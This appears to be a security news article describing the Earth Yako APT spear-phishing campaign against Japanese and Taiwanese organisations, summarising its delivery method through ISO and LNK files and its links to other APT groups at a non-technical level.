HQ/EMEAFind out how we can help your business
Japanese entities and organisations are the recent targets of a new active spear-phishing campaign dubbed Operation RestyLink or Enelink. Researchers said this new campaign has been active since January 2022 and has been upgrading its tactics, techniques, and procedures (TTPs) over time.
In this spear-phishing campaign, security researchers attributed the malicious activities to an APT group, ‘Earth Yako,’ which has been utilising legitimate cloud platforms like DropBox, GitHub, and Protonmail in expanding its activities across East Asia.
A spear-phishing URL is sent to the victims, which would help the threat group to have initial access to the targeted networks. If the victim clicks on the URL sent by the attackers, compressed or disc image files will be downloaded on their machines, containing a malicious shortcut file that will download an additional payload.
Entities in Taiwan are also targets of the Earth Yako spear-phishing campaign, besides Japan.
Analyses show that aside from security researchers, intelligence groups, and academics in Japan, some Taiwanese groups and organisations have also been struck by Earth Yako APT’s spear-phishing campaign.
Moreover, some of the sectors the group set up to target are economic security and energy.
It has also been discovered that Earth Yako APT shares similar technical features among other advanced persistent threat groups, including the DarkHotel, Cozy Bear (APT29), and APT10.
For the group’s initial access into a system, the researchers observed similarities with how the DarkHotel APT does it. Meanwhile, encryption routines and malware families used by the APT10 have also been seen being applied by Earth Yako.
For the Cozy Bear (APT29) group, Earth Yako APT was seen using ISO and LNK files in the attack process as them.
The APT group constantly changing TTPs indicate that they vary each attack tactic depending on the targeted country. Organisations and companies with weak network security have also been observed as the most common victims of the group’s campaigns.
